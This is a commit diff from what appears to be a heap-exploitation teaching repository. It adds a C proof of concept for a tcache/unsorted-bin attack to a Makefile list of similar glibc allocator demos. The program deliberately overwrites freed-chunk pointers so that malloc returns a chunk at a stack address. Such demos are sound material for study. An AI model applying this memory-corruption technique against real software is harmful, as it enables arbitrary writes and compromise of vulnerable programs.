update tcache_unsorted_bin_attack

src/others/3.1.6_heap_exploit/Makefile

@@ -1,4 +1,4 @@
-PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack house_of_einherjar house_of_orange
+PROGRAMS = fastbin_dup tcache_double-free fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore tcache_house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack tcache_unsorted_bin_attack house_of_einherjar house_of_orange
 CFLAGS += -std=c99 -g
 
 # CFLAGS += -fsanitize=address

src/others/3.1.6_heap_exploit/tcache_unsorted_bin_attack.c

@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main() {
+    unsigned long stack_var = 0;
+    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
+
+    unsigned long *p = malloc(0x80);
+    unsigned long *p1 = malloc(0x10);
+    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
+
+    free(p);
+    fprintf(stderr, "Freed the first chunk to put it in a tcache bin\n");
+
+    p[0] = (unsigned long)(&stack_var);
+    fprintf(stderr, "Overwrite the next ptr with the target address\n");
+    malloc(0x80);
+    malloc(0x80);
+    fprintf(stderr, "Now we malloc twice to make tcache struct's counts '0xff'\n\n");
+
+    free(p);
+    fprintf(stderr, "Now free again to put it in unsorted bin\n");
+    p[1] = (unsigned long)(&stack_var - 2);
+    fprintf(stderr, "Now write its bk ptr with the target address-0x10: %p\n\n", (void*)p[1]);
+
+    malloc(0x80);
+    fprintf(stderr, "Finally malloc again to get the chunk at target address: %p -> %p\n", &stack_var, (void*)stack_var);
+}